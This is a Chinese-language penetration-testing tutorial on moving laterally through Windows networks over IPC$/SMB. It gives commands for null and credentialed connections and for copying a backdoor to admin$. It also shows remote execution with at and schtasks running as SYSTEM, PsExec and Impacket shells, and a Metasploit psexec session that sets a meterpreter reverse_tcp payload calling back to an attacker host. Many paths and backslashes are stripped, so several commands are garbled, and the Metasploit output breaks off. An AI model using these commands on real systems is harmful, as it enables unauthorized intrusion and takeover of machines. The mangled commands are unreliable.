2023年11月29日发(作者:)

IPC远程连接

0x00 IPC使⽤端⼝:

1 、SMB:(Server Message Block) Windows协议族,⽤于⽂件打印共享的服务;

2 、NBT:(NETBios Over TCP/IP)使⽤137(UDP)138(UDP)139(TCP)端⼝实现基于TCP/IP协议的NETBIOS⽹络互联。

3 、在WindowsNT中SMB基于NBT实现,即使⽤139(TCP)端⼝;⽽在Windows2000中,SMB除了基于NBT实现,还可以直接通过445端⼝实现。

0x01 IPC连接常⽤命令:

当获取到可⽤于远程管理的账户时候,便可通过对ADMIN$⽬录建⽴IPC连接的⽅式远程连接到⼯作组或域内其他计算机,获取⽬标机器的控制权限。(内⽹渗透时曾遇到3389远程登录策略被禁⽌,且⽆该机器shell,但通过信息收

集获取到账号密码的情况,选择使⽤IPC连接)

net share // 查看是否开启IPC连接(windows默认开启共享)

net use 192.168.1.2 /u:domainnameadministrator password //建⽴ipc连接

net share ipc$ //开启ipc连接

net use 192.168.1.2ipc$ "" /user:"" //建⽴空连接

net use 192.168.1.2 /de /y //删除ipc连接

net time 192.168.1.2 //查看远程主机当前时间

net view 192.168.1.2 //查看共享⽬录

net view 192.168.1.2c$users //列出指定⽬录⽂件

copy 192.168.1.2C$windowstemp //复制⽂件

copy 192.168.1.2C$ //下载⽂件

tips:

默认情况下只有域管⽤户有权限对admin$⽬录建⽴IPC连接,其实本地的Administrator⽤户也可以,但是默认情况下该⽤户是被禁⽤的,如果启⽤了该⽤户,那么也可以使⽤Administrator⽤户远程连接

0x02 IPC计划任务执⾏命令:

at命令(已弃⽤):

copy ipadmin$system32 //将⼀次性后门复制到对⽅的系统⽂件夹下,前提是admin$开启

at ip 时间 //at命令远程运⾏,需要对⽅开启了'Task Scheduler'服务

schtasks命令:

schtasks /create /tn task1 /U 域⽤户 /P 域⽤户密码 /tr 命令 /sc ONSTART /s 域机器ip /RU system

⽰例(IPC已登录情况下,省略账号密码):

计划安全脚本 每 20 分钟运⾏⼀次。由于命令没有包含起始⽇期或时间,任务在命令完成 20 分钟后启动,此后每当系统运⾏它就每 20 分钟运⾏⼀次。请注意,安全脚本源⽂件位于远程计算机上,但任务在本地计算机上

计划并执⾏。

schtasks /create /tn "Security scrīpt" /sc minute /mo 20 /tr centraldatascrī

schtasks /run /tn task1 /s 192.168.10.2 /U /域⽤户 /P 域⽤户密码

schtasks /F /delete /tn task1 /s 域机器ip /U 域⽤户 /p 域⽤户密码

利⽤计划任务执⾏⽊马程序获得主机权限外,我们还可以利⽤schtasks计划任务直接执⾏系统命令,但由于不会回显,所以我们要将执⾏的结果写⼊到⼀个⽂本⽂件中,然后利⽤type命令远程读取:

schtasks /create /s 192.168.1.2 /tn test /sc minute /mo 20 /tr "C: /c 'whoami > C:'" /ru system /f

使⽤type命令读取⽂件内容:

type 192.168.1.2c$

注意:在使⽤schtasks命令时,会在系统中留下⽇志⽂件C:

0x03 PSEXEC 配合 IPC

1、在已建⽴IPC连接的前提下,使⽤微软官⽅⼯具pstools,反弹shell

net use ip /u:域名称域账号 密码

ip -s -acceptcula 反弹cmd

2、直接使⽤psexec登录并反弹cmd,或执⾏命令

psexec ip -u domainAdministrator -p password-s -acceptcula

psexec domain/user:password@ip whoami

0x04 Impacket配合IPC

domain/user:password@ip

domain/user:password@ip whoami

-

- 与官⽅相⽐会⾃动删除服务,增加隐蔽性*

domain/user:password@ip

domain/user:password@ip whoami

0x05 Metaspolit配合IPC

常⽤模块为:

exploit/windows/smb/psexec // psexec执⾏系统命令,相同

exploit/windows/smb/psexec_psh // 使⽤powershell作为payload(PsExecPowerShell版本)

auxiliary/admin/smb/psexec_command // 在⽬标机器上执⾏系统命令

exploit/windows/smb/ms17_010_psexec

以下使⽤exploit/windows/smb/psexec模块

tips:填⼊的hash为 LM hash:NTLM Hash

msf6 > use exploit/windows/smb/psexec

[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf6 exploit(windows/smb/psexec) > set LHOST 10.10.12.191

LHOST => 10.10.12.191

msf6 exploit(windows/smb/psexec) > set LPORT 1234

LPORT => 1234

msf6 exploit(windows/smb/psexec) > set RHOSTS 192.168.126.137

RHOSTS => 192.168.126.137

msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

Name Current Setting Required Description

---- --------------- -------- -----------